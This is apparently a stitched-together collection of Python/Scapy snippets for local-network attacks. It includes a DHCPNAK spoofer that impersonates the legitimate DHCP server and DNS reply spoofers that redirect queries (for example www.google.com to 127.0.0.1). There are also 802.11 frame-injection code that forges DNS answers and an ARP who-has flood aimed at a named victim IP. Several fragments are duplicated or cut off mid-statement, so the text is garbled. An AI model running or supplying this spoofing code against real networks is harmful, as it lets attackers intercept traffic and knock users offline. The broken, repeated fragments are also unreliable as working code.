def nak_request(pkt): msg("Spoofing DHCPNAK from " + globals()['dhcp_server_mac'], 2) sendp( Ether(src=globals()['dhcp_server_mac'], dst=pkt[Ether].dst) / IP(src=globals()['dhcp_server_ip'], dst=pkt[IP].dst) / UDP(sport=67, dport=68) / BOOTP(op=2, ciaddr=pkt[IP].src, siaddr=pkt[IP].dst, chaddr=pkt[Ether].src, xid=pkt[BOOTP].xid) / DHCP(options=[('server_id', globals()['dhcp_server_ip']), ('message-type', 'nak'), ('end')]))
def procPacket(p): #Lets grab the source mac and dst mac eth_layer = p.getlayer(scapy.Ether) src_mac = eth_layer.src dst_mac = eth_layer.dst #Now on to grabbing the src IP and dst IP ip_layer = p.getlayer(scapy.IP) src_ip = ip_layer.src dst_ip = ip_layer.dst #Woot..UDP Layer udp_layer = p.getlayer(scapy.UDP) src_port = udp_layer.sport dst_port = udp_layer.dport #And finally..the DNS layer dns_layer = p.getlayer(scapy.DNS) d = scapy.DNS() d.id = dns_layer.id #Transaction ID d.qr = 1 #1 for Response d.opcode = 16 d.aa = 0 d.tc = 0 d.rd = 0 d.ra = 1 d.z = 8 d.rcode = 0 d.qdcount = 1 #Question Count d.ancount = 1 #Answer Count d.nscount = 0 #No Name server info d.arcount = 0 #No additional records d.qd = str(dns_layer.qd) d.an = scapy.DNSRR(rrname="www.google.com.", ttl=330, type="A", rclass="IN", rdata="127.0.0.1") #Send the spoofed packet away! #Don't forget to switch stuffs lawl spoofed = scapy.Ether(src=dst_mac, dst=src_mac) / scapy.IP( src=dst_ip, dst=src_ip) / scapy.UDP(sport=dst_port, dport=src_port) / d #Off we go! scapy.sendp(spoofed, iface_hint=src_ip)
def procPacket(p): #Lets grab the source mac and dst mac eth_layer = p.getlayer(scapy.Ether) src_mac = eth_layer.src dst_mac = eth_layer.dst #Now on to grabbing the src IP and dst IP ip_layer = p.getlayer(scapy.IP) src_ip = ip_layer.src dst_ip = ip_layer.dst #Woot..UDP Layer udp_layer = p.getlayer(scapy.UDP) src_port = udp_layer.sport dst_port = udp_layer.dport #And finally..the DNS layer dns_layer = p.getlayer(scapy.DNS) d = scapy.DNS() d.id = dns_layer.id #Transaction ID d.qr = 1 #1 for Response d.opcode = 16 d.aa = 0 d.tc = 0 d.rd = 0 d.ra = 1 d.z = 8 d.rcode = 0 d.qdcount = 1 #Question Count d.ancount = 1 #Answer Count d.nscount = 0 #No Name server info d.arcount = 0 #No additional records d.qd = str(dns_layer.qd) d.an = scapy.DNSRR(rrname="www.google.com.", ttl=330, type="A", rclass="IN", rdata="127.0.0.1") #Send the spoofed packet away! #Don't forget to switch stuffs lawl spoofed = scapy.Ether(src=dst_mac, dst=src_mac)/scapy.IP(src=dst_ip, dst=src_ip)/scapy.UDP(sport=dst_port, dport=src_port)/d #Off we go! scapy.sendp(spoofed, iface_hint=src_ip)
dst = dot11_frame.getlayer(IP).src, ttl = TTL) dot11_answer /= UDP( sport = dot11_frame.getlayer(UDP).dport, dport = dot11_frame.getlayer(UDP).sport) dot11_answer /= DNS( id = dot11_frame.getlayer(DNS).id, qr = 1, qd = dot11_frame.getlayer(DNS).qd, an = DNSRR( rrname = dot11_frame.getlayer(DNS).qd.qname, ttl = 10, rdata = IPDNS) ) if DEBUG: os.write(1,"Sending DNS Reply on %s\n" % OUT_IFACE) if VERB: os.write(1,"%s\n" % dot11_frame.summary()) # Frame injection : sendp(dot11_answer,verbose=0) # Send frame # Program killed except KeyboardInterrupt: print "Stopped by user." s.close() sys.exit()
dot11_answer.addr3 = SMAC if WEP: dot11_answer.FCfield |= 0x40 dot11_answer /= Dot11WEP(iv="111", keyid=KEYID) dot11_answer /= ( LLC(ctrl=3) / SNAP() / IP(src=dot11_frame.getlayer(IP).dst, dst=dot11_frame.getlayer(IP).src, ttl=TTL) ) dot11_answer /= UDP(sport=dot11_frame.getlayer(UDP).dport, dport=dot11_frame.getlayer(UDP).sport) dot11_answer /= DNS( id=dot11_frame.getlayer(DNS).id, qr=1, qd=dot11_frame.getlayer(DNS).qd, an=DNSRR(rrname=dot11_frame.getlayer(DNS).qd.qname, ttl=10, rdata=IPDNS), ) if DEBUG: os.write(1, "Sending DNS Reply on %s\n" % OUT_IFACE) if VERB: os.write(1, "%s\n" % dot11_frame.summary()) # Frame injection : sendp(dot11_answer, verbose=0) # Send frame # Program killed except KeyboardInterrupt: print "Stopped by user." s.close() sys.exit()
# This array holds the MAC address from DHCP clients which have send a DHCPREQUEST. We use it to # cross reference it with ARP packets to see from which DHCP server a lease was obtained. macs = {} def msg(string, level): if globals()['verbose'] >= level: print(string) # Sending a DHCPDISCOVER to aquire the DHCP server IP. msg("Sending DHCPDISCOVER packet to discover DHCP servers", 2) sendp( Ether(src="00:00:00:00:00:00", dst="ff:ff:ff:ff:ff:ff") / IP(src="0.0.0.0", dst="255.255.255.255") / UDP(sport=68, dport=67) / BOOTP(chaddr="\x00\x00\x00\x00\x00\x00", xid=0x10000000) / DHCP(options=[('message-type', 'discover'), ('end')])) # Filtering out the DHCP server it's IP address, and storing it in a global variable. We ignore our # own DHCP server via a bpf filter in the sniff command below. def get_dhcp_server(pkt): if pkt[DHCP] and pkt[DHCP].options[0][1] == 2: globals()["dhcp_server_ip"] = pkt[IP].src globals()["dhcp_server_mac"] = pkt[Ether].src msg("Legit DHCP server found on " + globals()['dhcp_server_ip'], 1) # Detecting DHCPREQUEST packets and ARP packets. def detect_dhcp_request(pkt):
def nak_request(pkt): msg("Spoofing DHCPNAK from " + globals()['dhcp_server_mac'],2) sendp(Ether(src=globals()['dhcp_server_mac'], dst=pkt[Ether].dst)/ IP(src=globals()['dhcp_server_ip'],dst=pkt[IP].dst)/UDP(sport=67,dport=68)/ BOOTP(op=2, ciaddr=pkt[IP].src,siaddr=pkt[IP].dst,chaddr=pkt[Ether].src, xid=pkt[BOOTP].xid)/ DHCP(options=[('server_id',globals()['dhcp_server_ip']),('message-type','nak'), ('end')]))
# This array will hold the MAC from a DHCP client, and the number of times we have tried to spoof # a DHCPNAK from the legit DHCP server. attempted_dhcpnaks = {} # This array holds the MAC address from DHCP clients which have send a DHCPREQUEST. We use it to # cross reference it with ARP packets to see from which DHCP server a lease was obtained. macs = {} def msg(string, level): if globals()['verbose'] >= level: print(string) # Sending a DHCPDISCOVER to aquire the DHCP server IP. msg("Sending DHCPDISCOVER packet to discover DHCP servers",2) sendp(Ether(src="00:00:00:00:00:00",dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255") /UDP(sport=68,dport=67)/BOOTP(chaddr="\x00\x00\x00\x00\x00\x00",xid=0x10000000)/ DHCP(options=[('message-type','discover'),('end')])) # Filtering out the DHCP server it's IP address, and storing it in a global variable. We ignore our # own DHCP server via a bpf filter in the sniff command below. def get_dhcp_server(pkt): if pkt[DHCP] and pkt[DHCP].options[0][1] == 2: globals()["dhcp_server_ip"] = pkt[IP].src globals()["dhcp_server_mac"] = pkt[Ether].src msg("Legit DHCP server found on " + globals()['dhcp_server_ip'],1) # Detecting DHCPREQUEST packets and ARP packets. def detect_dhcp_request(pkt): if pkt[DHCP] and pkt[DHCP].options[0][1] == 3: msg("DHCPREQUEST detected from " + pkt[Ether].src,2) globals()['macs'][pkt[Ether].src] = pkt[Ether].src
#!/usr/bin/python import scapy,sys if not len(sys.argv) == 2: print "Must supply IP" sys.exit(1) victim = sys.argv[1] network = victim[:victim.rfind(".")+1] + "%d" tmac = scapy.getmacbyip(victim) for i in range(255): target = str(network % i) if target == victim: continue p = scapy.Ether(dst=tmac)/scapy.ARP(op="who-has", psrc=target, pdst=victim) scapy.sendp(p, iface_hint=target)
else: dot11_sent_frame.addr3 = SMAC if WEP: dot11_sent_frame.FCfield |= 0x40 dot11_sent_frame /= Dot11WEP( iv = "111", keyid = KEYID) dot11_sent_frame /= LLC(ctrl = 3)/SNAP(code=eth_rcvd_frame.getlayer(Ether).type)/eth_rcvd_frame.getlayer(Ether).payload if DEBUG: os.write(1,"Sending from-DS to %s\n" % OUT_IFACE) if VERB: os.write(1,"%s\n" % dot11_sent_frame.summary()) # Frame injection : sendp(dot11_sent_frame,verbose=0) # Send from-DS frame # Frame from WiFi network if s in r: # 802.11 maximum frame size is 2346 bytes (cf. RFC3580) # However, WiFi interfaces are always MTUed to 1500 dot11_rcvd_frame = s.recv(2346) # WEP handling is automagicly done by Scapy if conf.wepkey is set # Nothing to do to decrypt (although not yet tested) # WEP frames have Dot11WEP layer, others don't if DEBUG: if dot11_rcvd_frame.haslayer(Dot11WEP): # WEP frame os.write(1,"Received WEP from %s\n" % IN_IFACE)